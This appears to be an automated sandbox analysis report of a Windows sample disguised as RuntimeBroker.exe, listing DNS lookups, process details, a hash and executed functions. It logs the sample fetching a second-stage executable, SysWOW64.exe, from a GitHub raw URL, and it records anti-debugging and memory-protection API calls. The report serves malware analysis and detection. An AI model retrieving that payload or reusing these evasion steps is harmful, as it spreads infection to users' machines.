Mar 29, 2025 14:00:36.598462105 CET	1.1.1.1	192.168.2.5	0xf5c7	No error (0)	github.com		140.82.114.4	A (IP address)	IN (0x0001)	false
Mar 29, 2025 14:00:37.304069042 CET	1.1.1.1	192.168.2.5	0x1185	No error (0)	raw.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Mar 29, 2025 14:00:37.304069042 CET	1.1.1.1	192.168.2.5	0x1185	No error (0)	raw.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Mar 29, 2025 14:00:37.304069042 CET	1.1.1.1	192.168.2.5	0x1185	No error (0)	raw.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Mar 29, 2025 14:00:37.304069042 CET	1.1.1.1	192.168.2.5	0x1185	No error (0)	raw.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Mar 29, 2025 14:00:39.026340961 CET	1.1.1.1	192.168.2.5	0x99d9	Name error (3)	35.56.3.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Mar 29, 2025 14:00:44.754340887 CET	1.1.1.1	192.168.2.5	0x7bad	Name error (3)	c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com	none	none	A (IP address)	IN (0x0001)	false
Mar 29, 2025 14:00:44.859985113 CET	1.1.1.1	192.168.2.5	0x4532	No error (0)	ax-ring.ax-9999.ax-msedge.net	ax-9999.ax-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Mar 29, 2025 14:00:44.859985113 CET	1.1.1.1	192.168.2.5	0x4532	No error (0)	ax-9999.ax-msedge.net		150.171.28.254	A (IP address)	IN (0x0001)	false
Mar 29, 2025 14:00:44.859985113 CET	1.1.1.1	192.168.2.5	0x4532	No error (0)	ax-9999.ax-msedge.net		150.171.27.254	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

github.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49712	140.82.114.4	443	7788	C:\Users\user\Desktop\RuntimeBroker.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-29 13:00:36 UTC	113	OUT	GET /cyendd-sigma/notmine/raw/refs/heads/main/SysWOW64.exe HTTP/1.1 Host: github.com Connection: Keep-Alive
2025-03-29 13:00:37 UTC	562	IN	HTTP/1.1 302 Found Date: Sat, 29 Mar 2025 13:00:37 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame,Accept-Encoding, Accept, X-Requested-With Access-Control-Allow-Origin: Location: https://raw.githubusercontent.com/cyendd-sigma/notmine/refs/heads/main/SysWOW64.exe Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2025-03-29 13:00:37 UTC	3476	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.githu

Statistics

CPU Usage

• RuntimeBroker.exe

Click to jump to process

Memory Usage

• RuntimeBroker.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry
• Network

Click to dive into process behavior distribution

Target ID:	0
Start time:	09:00:34
Start date:	29/03/2025
Path:	C:\Users\user\Desktop\RuntimeBroker.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\RuntimeBroker.exe"
Imagebase:	0xbc0000
File size:	79'392 bytes
MD5 hash:	61FD0424631FC50F17989C516950935E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage

Dynamic/Packed Code Coverage

Signature Coverage

Execution Coverage:	15.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.8%
Total number of Nodes:	79
Total number of Limit Nodes:	3

Executed Functions

Function 058411C8 Relevance: 5.9, APIs: 1, Strings: 2, Instructions: 611
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 05841A93

Strings

, xrefs: 058414DE
@, xrefs: 0584195D

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID: ProtectVirtual
String ID: $@
API String ID: 544645111-1077428164
Opcode ID: 6beee2770e0c2f7fda3e595f6ccea652f3799a28a3bbf6ea9df7f18b3548c405
Instruction ID: b4200d73268ef6c76a5e9d2928f3130f247f4e1ef7e3f1ca17c5ff68c0046de6
Opcode Fuzzy Hash: 6beee2770e0c2f7fda3e595f6ccea652f3799a28a3bbf6ea9df7f18b3548c405
Instruction Fuzzy Hash: 5252A074E002598FCB24CF59C984B9EBBF2FF48310F5581A9E859AB261E734AD81CF51

Function 05848D20 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 776COMMON

Download Yara Rule

APIs

Part of subcall function 0584869C: VirtualProtect.KERNEL32(?,00000008,?,0000003C,?,?,?,?,?,05849093,?,00000040), ref: 05849743

CloseHandle.KERNEL32 ref: 0584968F

Strings

ntin, xrefs: 058493C7
ue, xrefs: 058493CE

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID: CloseHandleProtectVirtual
String ID: ntin$ue
API String ID: 3173283821-3378103365
Opcode ID: c372f886099f6e2004b97da7369f7364511561f64ef0d0c391bb03ef035ec42a
Instruction ID: 6ab462b0407e6909b7f4bcf9021d133316fbce17892b948aab006e527924a49c
Opcode Fuzzy Hash: c372f886099f6e2004b97da7369f7364511561f64ef0d0c391bb03ef035ec42a
Instruction Fuzzy Hash: 2D623D71A042298FDB24CFA9C880BAEBBF6BF44304F158099D949EB295E734DD81CF55

Function 0584EF80 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0584EFF7

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 772cd0b09099efb513571a7078b29e55b3e3a22dbaef28c4b818f68364114364
Instruction ID: 282637eb83db56eb298e907ec9fabd688fce7a96f9ddfd6be95a6d64300718e6
Opcode Fuzzy Hash: 772cd0b09099efb513571a7078b29e55b3e3a22dbaef28c4b818f68364114364
Instruction Fuzzy Hash: 632125B1801259CFDB10CF9AD884BEEFBF8EF49320F14845AE955A3250D378A944CF61

Function 058499C0 Relevance: 1.5, Strings: 1, Instructions: 282COMMON

Download Yara Rule

Strings

"vn, xrefs: 05849B67

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: "vn
API String ID: 0-4119310160
Opcode ID: c54866b0b3a5f165147df4d89d6cc27c19fe0fec0d812ea91f1de4178e9fbaac
Instruction ID: e0c20fd97ac5c1a4d6893bdc39ac0ac21573bb4784d66805620f359dce30bc7c
Opcode Fuzzy Hash: c54866b0b3a5f165147df4d89d6cc27c19fe0fec0d812ea91f1de4178e9fbaac
Instruction Fuzzy Hash: 1FB1B130B142099FDB24DB74D854B6EBBB7FB88300F148069E906EB295DB799C45CF91

Function 05846CC0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

\Vln, xrefs: 05846F77

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: \Vln
API String ID: 0-2884392432
Opcode ID: d68ba0da712b2d39ac2abd70937f5481043730b9cd14f16f6e3be1b21e5dd8c0
Instruction ID: 7a643e8d4961bef327dcc1a9d52bbc02b3a7e0732bcdd79e05809f2b0ad2bce3
Opcode Fuzzy Hash: d68ba0da712b2d39ac2abd70937f5481043730b9cd14f16f6e3be1b21e5dd8c0
Instruction Fuzzy Hash: 43B12770E0021DCBDB10CFAAC8857AEBBF2BB89714F148129DC55EB294EB759845CF91

Function 058499B0 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

"vn, xrefs: 05849B67

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: "vn
API String ID: 0-4119310160
Opcode ID: 5989db784af211dbace0e29e3e344cbc8248dfafea12ec22df92b1fdf8e59856
Instruction ID: 93b7e79e9c19fe9292e888d787c2fd6dd4e89c614da0eaa520ce8ee9978ec02c
Opcode Fuzzy Hash: 5989db784af211dbace0e29e3e344cbc8248dfafea12ec22df92b1fdf8e59856
Instruction Fuzzy Hash: 11A1A030B042099FDB24DB78D854B6EBBB6FB88300F548069E906EB294DF799C44CF91

Function 05846978 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\Vln, xrefs: 05846BC3

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID:
String ID: \Vln
API String ID: 0-2884392432
Opcode ID: e10f59c8922505d045ddea2db966fa73499fb6b60745e347559d7cffed8aaaca
Instruction ID: d4df958f8127b4a1ea1a163c93e058c169b5e2d6c39e4f95fa8e131cacbea01b
Opcode Fuzzy Hash: e10f59c8922505d045ddea2db966fa73499fb6b60745e347559d7cffed8aaaca
Instruction Fuzzy Hash: 7F912970E0060D9FDB14CFAAC9857ADBBF2BB89314F248129EC15E7294EB749845CF91

Function 05841C88 Relevance: .9, Instructions: 853COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d32d5caa4743838b3aad56c2d9fde3df0647bb41bac9041421c1b54a98362d3
Instruction ID: b35cfd3da1429d7561e0db50307a873e4a395bb0e6958d3724382b6821a06a2a
Opcode Fuzzy Hash: 2d32d5caa4743838b3aad56c2d9fde3df0647bb41bac9041421c1b54a98362d3
Instruction Fuzzy Hash: 8F72BF34A081199FCB14CBA9D4809BDFBF2FF84305F19856AE856DB256C634DD82CFA4

Function 05840C98 Relevance: .5, Instructions: 456COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0eb7a15a38e74d65d1c60e120e45c9221dea26530dfcfce8dd0e2afc2036ad4
Instruction ID: f42a7830555fc1a0f4703bf010fe6316cfdb989446a7eba26211bc4d7485cd56
Opcode Fuzzy Hash: b0eb7a15a38e74d65d1c60e120e45c9221dea26530dfcfce8dd0e2afc2036ad4
Instruction Fuzzy Hash: F1E12736600210AFDB058FA4C954E6ABBB3FF8C714F0684E8E6095F272CA36DC55DB91

Function 05840CA8 Relevance: .4, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35c88a97375312218930978b43f332ec04b5895c5acd57a48c4ee2a67e908a30
Instruction ID: e6aa321840b29e2b45813e858139d0f64691b69be2dc6158c4c94ceb17c4ae74
Opcode Fuzzy Hash: 35c88a97375312218930978b43f332ec04b5895c5acd57a48c4ee2a67e908a30
Instruction Fuzzy Hash: 9EE11636600210AFDB059FA4C954E6ABBB3FF8C714F1684E8E6095F271CA32DC55DB91

Function 05847590 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcd60470f9786441cce1ee71bd0d3653bbede405fa8d3f8007d4ab0dc4991c22
Instruction ID: 59128e67ab2a09b1b757d2a76c6c911eef75e0372b7a2ae9e99cd18a35aaeb7b
Opcode Fuzzy Hash: bcd60470f9786441cce1ee71bd0d3653bbede405fa8d3f8007d4ab0dc4991c22
Instruction Fuzzy Hash: 41B12670E0420D9BDB14CFA9C8857AEBBF2FB88314F148129DC15E7294EB74A846CF95

Function 058407FF Relevance: 1.6, APIs: 1, Instructions: 75
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 05841A93

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 498f5acd6dce4bf4c4e270f771a09a518e68762078eca7d463492688b2ae8dd7
Instruction ID: 75b37d6d43187de002b060d3dd220d26e94aa363b722812f71cb2b11ca1dff08
Opcode Fuzzy Hash: 498f5acd6dce4bf4c4e270f771a09a518e68762078eca7d463492688b2ae8dd7
Instruction Fuzzy Hash: F2218C71D053598FCB00CFA9C444ADEBFF4EF48320F10806AE954A7201D3389945CFA0

Function 0584EF79 Relevance: 1.6, APIs: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckRemoteDebuggerPresent.KERNEL32(?,?), ref: 0584EFF7

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID: CheckDebuggerPresentRemote
String ID:
API String ID: 3662101638-0
Opcode ID: 9952c5cd48d50202bb3a52b48b56ef92a3f09aa9985da0fc5cf5cbe46ca94d6f
Instruction ID: fc31181232999ec1f411f2f4b507b5ecca4bad510d75aa562c3b1d7456b1772e
Opcode Fuzzy Hash: 9952c5cd48d50202bb3a52b48b56ef92a3f09aa9985da0fc5cf5cbe46ca94d6f
Instruction Fuzzy Hash: E22136B18012598FCB10CF9AD884BEEFBF4AF48320F14855AE965B3290D3389944CF60

Function 05848699 Relevance: 1.6, APIs: 1, Instructions: 61
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,00000008,?,0000003C,?,?,?,?,?,05849093,?,00000040), ref: 05849743

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a2ec1e6ecdf95f5404d773a4f718f1cba7f75ad6d12934e4b42ad4ebbdb385cd
Instruction ID: 44d22b55a2ff4a1befbfcb379a16c64173f3ae210f34f254b53232aa5d5416cd
Opcode Fuzzy Hash: a2ec1e6ecdf95f5404d773a4f718f1cba7f75ad6d12934e4b42ad4ebbdb385cd
Instruction Fuzzy Hash: 3F21E3B590464D9FCB10CF9AC884BEFFBF5EB48320F108029E958A7251D778A944CFA5

Function 058496C8 Relevance: 1.6, APIs: 1, Instructions: 61
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,00000008,?,0000003C,?,?,?,?,?,05849093,?,00000040), ref: 05849743

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: e644dcb128cecb3eafb134c2c623d14351097516ee2da86d970ffc5982efd400
Instruction ID: a93b67b09fa74e6308c9e1e6a4196e954be9941bae64ca6cc88d58455118aaf7
Opcode Fuzzy Hash: e644dcb128cecb3eafb134c2c623d14351097516ee2da86d970ffc5982efd400
Instruction Fuzzy Hash: EE21F7759016499FCB10CF9AD885BDFFBF4EF48320F108429E958A7251D778AA44CFA1

Function 0584869C Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,00000008,?,0000003C,?,?,?,?,?,05849093,?,00000040), ref: 05849743

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 5c6cc1bd6bef227759870243106ea6947d1593c6c7e6276d03c7884bbc52fcf6
Instruction ID: d65d5129f3e5114cddb8e9ad82794519a14810ddf0dc3bcc48070e0886ba5591
Opcode Fuzzy Hash: 5c6cc1bd6bef227759870243106ea6947d1593c6c7e6276d03c7884bbc52fcf6
Instruction Fuzzy Hash: 0521F2B590464D9FCB20CF9AC484BDEFBF5FB48320F108029E968A7251D378A944CFA5

Function 0584081C Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 05841A93

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 4eaf6bf6d7798e28145c3297f0dd2a6f6bbf5bb37b06083e0b36db36aa689b7c
Instruction ID: b4638239e995bb299d28572b2be97f4688b1e6330e772557b24b99fae2b00ad6
Opcode Fuzzy Hash: 4eaf6bf6d7798e28145c3297f0dd2a6f6bbf5bb37b06083e0b36db36aa689b7c
Instruction Fuzzy Hash: 1721F475D046499FCB10CF9AC484BDEFBF5FB48320F108429E958A7251D378A944CFA1

Function 0584FAC8 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(?,00000008), ref: 0584FB32

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 8c244d38d1ffd790c703f8ed807f1fc66124eb9e0418e5d7b9622dd5d49eb87f
Instruction ID: 2fd90efc0f14ed3857621a1d3b8a33c7323b0842f8290634874e05d935e03a52
Opcode Fuzzy Hash: 8c244d38d1ffd790c703f8ed807f1fc66124eb9e0418e5d7b9622dd5d49eb87f
Instruction Fuzzy Hash: 511126B18016499FDB20CF9AD845BDEFBF5EB48320F108429E958A7340C738A944CFA1

Function 05840C0C Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000), ref: 05844170

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7f13e8138c1791259c1140d5bd3784a20a901d6bb4fde308a7b72904709a4917
Instruction ID: 41620051195e08cb1a50dfe0de719d1019112e1b173c16653483a5f9b00ddb60
Opcode Fuzzy Hash: 7f13e8138c1791259c1140d5bd3784a20a901d6bb4fde308a7b72904709a4917
Instruction Fuzzy Hash: 6D2124B1C046599BCB14DF9AD844B9EFBB4FB48320F10812AE919A7210D774A900CFA0

Function 058440F8 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000), ref: 05844170

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 73a77a4cb0c79eaa63d0d531aa07c21f547c21adab15dcb57642eaddde81f036
Instruction ID: f402c9c82612a39047e4ea4f71982ca3f21df15879183c7fb434d66421751778
Opcode Fuzzy Hash: 73a77a4cb0c79eaa63d0d531aa07c21f547c21adab15dcb57642eaddde81f036
Instruction Fuzzy Hash: 9A2136B1D0565A9BCB14CFAAD844B9EFBB5FF48320F14825AD819A7210C738A944CFA1

Function 0584FAD0 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(?,00000008), ref: 0584FB32

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 7ef04ba6a07fd865f01561214e94723802453634b6da039c81e5d53fd709fd0a
Instruction ID: b46ccd590db3eb91c2b3f114af104cac8c729f5bdc91bd111e4bde483d00c6cf
Opcode Fuzzy Hash: 7ef04ba6a07fd865f01561214e94723802453634b6da039c81e5d53fd709fd0a
Instruction Fuzzy Hash: E91125718006498FDB10CF9AC585BDEFBF4EF89320F248429D968A7341D778A944CFA1

Function 05848684 Relevance: 1.3, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 0584968F

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: c7133e5aa447cc297c9e2d0aa9063e0ee182249b291720c7b8646e23f8fa92bc
Instruction ID: 25a0685e124786076dd1e734dab65e7fcda93595e80f95d5b282cb2c4c7bbd46
Opcode Fuzzy Hash: c7133e5aa447cc297c9e2d0aa9063e0ee182249b291720c7b8646e23f8fa92bc
Instruction Fuzzy Hash: 4C1100B180464CCFCB20DF9AC488B9EFBF5EB49324F20845AD919B7240D379A944CFA5

Function 017CD4E0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1548707434.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17cd000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43861856e693ddca609ee77cd8b589f98222b434110ee4a2e942915d0f15bc87
Instruction ID: 567e12b098bc1b33d69b578424b0c3c3ab80f2ff502031a7dfe97b048b18d2a7
Opcode Fuzzy Hash: 43861856e693ddca609ee77cd8b589f98222b434110ee4a2e942915d0f15bc87
Instruction Fuzzy Hash: D321E071504200DFDB25DF98E980B26FF65EBA8718F3481ADE90A0A256C336D456CAE1

Function 017CD5CC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1548707434.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17cd000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 338ff387e8ce63aaae5f9d9072712287bfffcee8998520f812c2ea0b24878fcb
Instruction ID: c67bb18912aca9c327b5ff02dd0fee93bd72ea6c47b241da510eab7f345d7fb1
Opcode Fuzzy Hash: 338ff387e8ce63aaae5f9d9072712287bfffcee8998520f812c2ea0b24878fcb
Instruction Fuzzy Hash: DC212FB1104204DFDB25DF94D8C0F26FF62FB98B24F2085ADE9091A25AC33AD456CBA1

Function 017CD4DB Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1548707434.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17cd000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d2c5b9ffd8ff0f9cbbb80413dfb3115e8ac247fddb14c65a9e2f75736b281c2
Instruction ID: ded18c13732ff9edff11d893a577ce9289dd0d782ab3dfb4636aa93e6dde4d94
Opcode Fuzzy Hash: 6d2c5b9ffd8ff0f9cbbb80413dfb3115e8ac247fddb14c65a9e2f75736b281c2
Instruction Fuzzy Hash: 23119D76504240DFDB16CF54D9C4B16BF62FB98724F2485ADD8090A256C336D456CBA1

Function 017CD5C7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1548707434.00000000017CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 017CD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17cd000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d2c5b9ffd8ff0f9cbbb80413dfb3115e8ac247fddb14c65a9e2f75736b281c2
Instruction ID: b34fe2c78b8ca8a726ea087eda055f64b95c91a8ba54a708ba18759c5bc9ec92
Opcode Fuzzy Hash: 6d2c5b9ffd8ff0f9cbbb80413dfb3115e8ac247fddb14c65a9e2f75736b281c2
Instruction Fuzzy Hash: 0011AF76504244CFCB16CF54D9C4B16FF62FB84714F2486ADD8490B257C336D45ACBA1

Non-executed Functions

Function 05848028 Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1552122375.0000000005840000.00000040.00000800.00020000.00000000.sdmp, Offset: 05840000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5840000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d8491dba5c73b4c1d0e0aa14ea8cf4762ae4f9eb04086747fabc0d41ddd2e03
Instruction ID: 458444700accddc9be5287144c2e5a50c60e76f541e7473d218b1bb7418a4fcb
Opcode Fuzzy Hash: 2d8491dba5c73b4c1d0e0aa14ea8cf4762ae4f9eb04086747fabc0d41ddd2e03
Instruction Fuzzy Hash: 89B19034A0462CCFDB14DB69D594B7E76B6FB88310F258429ED06D7290CB39DC828F95

